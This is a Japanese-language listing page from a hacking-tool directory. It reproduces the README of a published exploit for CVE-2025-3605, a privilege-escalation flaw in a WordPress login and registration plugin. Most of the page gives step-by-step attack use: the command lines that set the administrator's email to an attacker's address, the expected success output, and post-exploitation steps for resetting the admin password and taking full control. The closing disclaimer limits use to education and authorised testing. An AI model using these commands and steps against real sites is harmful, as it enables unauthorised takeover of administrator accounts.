Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-3605 — WordPress Frontend Login and Registration Blocks プラグイン <= 1.0.7 は権限昇格の脆弱性の影響を受けます | Kitploit
ツール/GitHubGitHub/nxploited/cve-2025-3605
特権昇格パスワード攻撃脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubnxploited/cve-2025-3605

CVE-2025-3605

WordPress Frontend Login and Registration Blocks プラグイン <= 1.0.7 は権限昇格の脆弱性の影響を受けます

リポジトリを見る
231年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🚀 CVE-2025-3605 エクスプロイトガイド

🛡️ 脆弱性の概要

WordPress 用プラグイン Frontend Login and Registration Blocks(バージョン <= 1.0.7)には、アカウント乗っ取りによる権限昇格の脆弱性があります。
この問題は、flr_blocks_user_settings_handle_ajax_callback() 関数がメールなどの機密情報を更新する際に、ユーザー本人確認を行わないために発生します。

✅ 影響:
認証されていない攻撃者が管理者のメールアドレスを変更し、「パスワードを忘れた場合」のプロセスを起動して管理者パスワードをリセットし、完全な制御を取得できます。


💥 概念実証(PoC)

同梱の Python スクリプトは、脆弱な AJAX エンドポイントをターゲットにして悪用プロセスを自動化します:

root@kitploit:~
/wp-admin/admin-ajax.php

このスクリプトは、対象ユーザー(通常は管理者の user_id 1)のメールを攻撃者が管理するメールに更新します。


📦 同梱スクリプト

ファイル名: CVE-2025-3605.py

root@kitploit:~
python CVE-2025-3605.py --url http://target-site/wordpress --user_id 1 --mail [email protected]

✅ デフォルト値:

  • --user_id: 1(デフォルトの管理者)
  • --mail: [email protected]

🖥️ 使用方法とヘルプ

ヘルプメニューを表示するには、次を実行します:

root@kitploit:~
python CVE-2025-3605.py --help

出力:

root@kitploit:~
[+] Starting exploit script...
usage: a.py [-h] --url URL [--user_id USER_ID] [--mail MAIL]

Frontend Login and Registration Blocks Plugin <= 1.0.7 is vulnerable to Privilege Escalation # By Nxploited (Khaled Alenazi)

options:
  -h, --help            show this help message and exit
  --url, -u URL         Target URL, e.g., http://192.168.100.74:888/wordpress
  --user_id, -id USER_ID
                        User ID to target (default: 1)
  --mail, -mail MAIL    Email to set (default: [email protected])

✅ 実行例:

root@kitploit:~
python CVE-2025-3605.py -u http://192.168.100.74:888/wordpress -id 1 -mail [email protected]

🎯 期待される出力

✅ 成功時:

root@kitploit:~
[+] Starting exploit script...
[+] Sending exploit to http:/target.com/wp-admin/admin-ajax.php/wp-admin/admin-ajax.php
[+] Exploit successful! Response: {"status":true,"message":"Operation has been completed successfully."}
[+] Final Step: Go to the Forgot Password page and reset the admin password using the new email!
Exploit By : Khaled_alenazi ( Nxploited )

❌ 失敗時:

root@kitploit:~
[!] Exploit failed. HTTP Status: 400
[!] Response: 0

🔑 悪用後

1️⃣ 次の URL に移動します:

root@kitploit:~
http://target-site/wordpress/wp-login.php

2️⃣ 設定した新しいメール([email protected])を入力します。

3️⃣ パスワードリセットをリクエストします。

4️⃣ 新しいパスワードを設定します。

5️⃣ 管理者としてログインし、完全なアクセスを利用します。


⚠️ 免責事項

このエクスプロイトとスクリプトは、教育目的および許可されたテスト目的のみで提供されています。
所有していないシステムや明示的なテスト許可がないシステムへの不正使用は、違法かつ非倫理的です。


作成者: Khaled Alenazi (Nxploited)

ツールをダウンロード